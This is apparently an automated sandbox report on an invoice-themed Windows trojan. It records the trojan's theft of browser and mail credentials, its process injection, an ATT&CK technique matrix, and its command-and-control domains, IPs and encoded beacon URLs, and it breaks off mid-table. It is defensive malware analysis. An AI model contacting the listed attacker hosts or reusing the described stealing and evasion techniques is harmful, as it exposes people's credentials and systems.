            Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: Revised Invoice H000127896.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Revised Invoice H000127896.exeBinary or memory string: WIN_XP
            Source: Revised Invoice H000127896.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: Revised Invoice H000127896.exeBinary or memory string: WIN_XPe
            Source: Revised Invoice H000127896.exeBinary or memory string: WIN_VISTA
            Source: Revised Invoice H000127896.exeBinary or memory string: WIN_7
            Source: Revised Invoice H000127896.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            2
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS16
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets141
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520359 Sample: Revised Invoice H000127896.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 28 www.nodigitalsmoke.org 2->28 30 www.concept.pink 2->30 32 6 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 5 other signatures 2->48 10 Revised Invoice H000127896.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 13 svchost.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 MUjPkRkjOWKkX.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 replace.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 MUjPkRkjOWKkX.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 concept.pink 217.160.0.27, 49713, 49714, 49715 ONEANDONE-ASBrauerstrasse48DE Germany 22->34 36 www.5oxzis.top 20.2.217.253, 49717, 49718, 49719 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->36 38 2 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Revised Invoice H000127896.exe42%ReversingLabsWin32.Trojan.Autoitinject
            Revised Invoice H000127896.exe100%AviraHEUR/AGEN.1321293
            Revised Invoice H000127896.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.07t90q.vip/9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw==0%Avira URL Cloudsafe
            http://www.5oxzis.top/6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XX0%Avira URL Cloudsafe
            http://www.kuaimaolife.shop/j39u/0%Avira URL Cloudsafe
            http://www.5oxzis.top/6tyq/0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.nodigitalsmoke.org/pnbu/0%Avira URL Cloudsafe
            http://www.kuaimaolife.shop/j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XX0%Avira URL Cloudsafe
            http://www.concept.pink/4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XX0%Avira URL Cloudsafe
            http://www.nodigitalsmoke.org0%Avira URL Cloudsafe
            http://www.concept.pink/4yov/0%Avira URL Cloudsafe
            https://www.strato.de0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            07t90q.vip
            3.33.130.190
            truefalse
              unknown
              nodigitalsmoke.org
              3.33.130.190
              truefalse
                unknown
                concept.pink
                217.160.0.27
                truefalse
                  unknown
                  www.kuaimaolife.shop
                  38.55.251.233
                  truefalse
                    unknown
                    www.5oxzis.top
                    20.2.217.253
                    truefalse
                      unknown
                      www.concept.pink
                      unknown
                      unknowntrue
                        unknown
                        www.nodigitalsmoke.org
                        unknown
                        unknowntrue
                          unknown
                          www.07t90q.vip
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://www.07t90q.vip/9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw==false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.kuaimaolife.shop/j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XXfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.nodigitalsmoke.org/pnbu/false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.5oxzis.top/6tyq/false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.5oxzis.top/6tyq/?jz=jni3yiZJ4S7NmP87TLfQaIY/X77PcNTCOCcZxoXAf1kPTUY8H/4jiZTjzWgxt/+cQPOpbdgRSQIQgbB1DSTxgzvKKTE3COfRXcz2obzALE1MyEAjEb6tnUq41l0wGlUpcQ==&npb=3FKhBrgHxb5d5XXfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.kuaimaolife.shop/j39u/false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.concept.pink/4yov/false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.concept.pink/4yov/?jz=wLmY7AOB32o0S2u42dQo01BhAozElJEy6rFAsgDZdNn+sW1g/TF+eJ3R19ZQOPzynTi6ZGviANY3o1+5ycRViPNI2Nw+8mxels4+I7slmp23cyQYmVgQCmd7LylHNAhJBA==&npb=3FKhBrgHxb5d5XXfalse
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ac.ecosia.org/autocomplete?q=replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://duckduckgo.com/chrome_newtabreplace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://duckduckgo.com/ac/?q=replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoreplace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.nodigitalsmoke.orgMUjPkRkjOWKkX.exe, 00000007.00000002.3292411346.0000000001275000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.ecosia.org/newtab/replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000005.00000003.2713427393.00000000072AE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://www.strato.deMUjPkRkjOWKkX.exe, 00000007.00000002.3293199751.00000000035D6000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            217.160.0.27
                            concept.pinkGermany
                            8560ONEANDONE-ASBrauerstrasse48DEfalse
                            20.2.217.253
                            www.5oxzis.topUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            38.55.251.233
                            www.kuaimaolife.shopUnited States
                            174COGENT-174USfalse
                            3.33.130.190
                            07t90q.vipUnited States
                            8987AMAZONEXPANSIONGBfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1520359
                            Start date and time:2024-09-27 09:06:04 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 8m 0s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:2
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Revised Invoice H000127896.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@7/2@7/4
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 52
                            • Number of non-executed functions: 301
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target MUjPkRkjOWKkX.exe, PID 3576 because it is empty
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • VT rate limit hit for: Revised Invoice H000127896.exe
                            TimeTypeDescription
                            03:08:19API Interceptor722258x Sleep call for process: replace.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            217.160.0.27hesaphareketi-01.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.austintrafficlawyer.com/ac9t/?wT7P=BSX0DHFCkeRuIuC9aNIxPjQAkc6OMQBOI5VXSM1sJH3dc8P1lqyosRwwP84ABr/cxKegDc3ylA7Q6LIOUWXqfoMCS4X8uyDH8g==&Ahm=OJYxThc8VTyL_TWP
                            Antndte.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.austintrafficlawyer.com/3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1
                            27112023110107pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.austintrafficlawyer.com/iv0r/?cHm4=NW3zugcUREcol4uDaFNo/hQtWcWVL6vHACe7Dopasm3sBm0TPJr15qVO75z3TpGwI48xhkksmXuol2/YLEBTMXnEJLOTbwSo8g==&vnkds=VfPlP
                            PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                            • www.austintrafficlawyer.com/cvps/?-Lkxp=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&ojQxW=_LZhZtRhEB2XP
                            INV#761538.exeGet hashmaliciousFormBookBrowse
                            • www.austintrafficlawyer.com/cvps/?pf5=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&kDuhz=t6NP562HYH_
                            Document.exeGet hashmaliciousFormBookBrowse
                            • www.austintrafficlawyer.com/cvps/?Tb-PA8s8=66w3kdnE8g+zQIqb4O3TRfQ2nh9AONXNtOykSjUErfQ2fpuIbm0J4VtuOB9R0Ir6j8W9r2eGEZ6dsDozBejoOLjUCYfOrFI45g==&0H=BrFhG8npvv
                            DbkrlzhE3S.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • www.cloudninemodels.co.uk/ks01/?bN6=Dtldzzl&oV0LWR=HXS6Dgx9Q88pip/zEWSWLsHrn6Z0ieZrAS1SZp7em4AQeDsYfhUH5nTmvgpC6C2eYvMv
                            tGawAEY26l.exeGet hashmaliciousGrandcrab, GandcrabBrowse
                            • lucides.co.uk/
                            rl86XSdHhM.exeGet hashmaliciousGrandcrab, GandcrabBrowse
                            • lucides.co.uk/
                            20.2.217.253Shipping document_pdf.exeGet hashmaliciousFormBookBrowse
                            • www.ooukqu.top/cidd/
                            New order.exeGet hashmaliciousFormBookBrowse
                            • www.ooukqu.top/cidd/
                            3.33.130.190shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                            • www.consultarfacil.online/f1ix/
                            PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                            • www.linkwave.cloud/al6z/
                            NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                            • www.o731lh.vip/2mtz/
                            RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                            • www.airtech365.net/87wq/
                            H9DsG7WKGt.exeGet hashmaliciousFormBookBrowse
                            • www.wirewizardselectric.net/btrd/?OXxH-=4g1xeR5Sr0O5KVFc15zB56K+BPAX9uki7kKu7P5TG8qPREbIOpOex+bABSY3j4XKcAWB&t8l4=FrILp2Q
                            eMoS6hG54p.exeGet hashmaliciousFormBookBrowse
                            • www.xmentorgroup.com/btrd/?PL=UYDnSobQX5O+UDHC89bcJt5KVoSCT9YF2HLfXae5rEf1x05YiJjvSBJ7kWs5TcoT1iKc&QZ0=fjlpir7xm81xV2
                            CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                            • www.omexai.info/7xi5/
                            TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                            • www.techtalks.live/bopi/?EnAHS=ByUa8OodiJXTyccBcTlBSWluyrmxCMFqSamo3/fZr1sZUY0l87vOSnRQaUoYZRNWeWFC&0T5=UL08qvZHLtV
                            PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                            • www.analyticalmkr.com/0vp1/
                            rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                            • www.linkwave.cloud/al6z/
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ONEANDONE-ASBrauerstrasse48DEADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                            • 74.208.236.183
                            http://hye.com.mxGet hashmaliciousUnknownBrowse
                            • 82.165.213.220
                            PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                            • 217.160.0.231
                            RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                            • 74.208.236.183
                            r8x1WvSkbWSUjXh6.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 213.165.67.102
                            http://pub-445e7cdb51914c22986bb9246f7fa359.r2.dev/webmailionoss.htmlGet hashmaliciousHTMLPhisherBrowse
                            • 74.208.255.201
                            2240902473.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 213.165.67.103
                            ZcH50SI4q45Dtpf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 213.165.67.118
                            Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                            • 74.208.236.183
                            Quotation #10091.exeGet hashmaliciousFormBookBrowse
                            • 217.160.0.10
                            COGENT-174UShttps://tiktomallapp.top/Get hashmaliciousUnknownBrowse
                            • 149.115.248.79
                            shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                            • 38.180.87.102
                            http://rmdown.downrenminbank.cc/Get hashmaliciousUnknownBrowse
                            • 149.104.35.170
                            http://v884.cc/Get hashmaliciousUnknownBrowse
                            • 154.55.135.62
                            http://hbyczyz.com/xrrGet hashmaliciousUnknownBrowse
